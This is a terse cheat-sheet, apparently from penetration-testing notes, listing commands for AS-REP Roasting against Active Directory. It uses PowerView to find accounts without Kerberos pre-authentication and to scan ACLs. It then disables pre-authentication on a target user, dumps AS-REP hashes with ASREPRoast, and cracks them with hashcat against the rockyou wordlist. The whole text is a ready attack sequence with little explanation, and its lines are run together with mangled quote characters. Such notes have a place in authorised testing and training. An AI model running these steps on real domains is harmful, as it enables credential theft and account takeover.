AS-REPS Roasting
. .\Powerview_dev.ps1
Get-DomainUser -PreauthNotRequired -VerboseGet-DomainUser -PreauthNotRequired -verbose | select samaccountnameInvoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match β<groupname>β}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match β<groupname>β} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose. ./ASREPRoast.ps1
Get-ASREPHash -Username <username> -VerboseInvoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Verbose | flHashcat -a 0 -m 18200 hash.txt rockyou.txtLast updated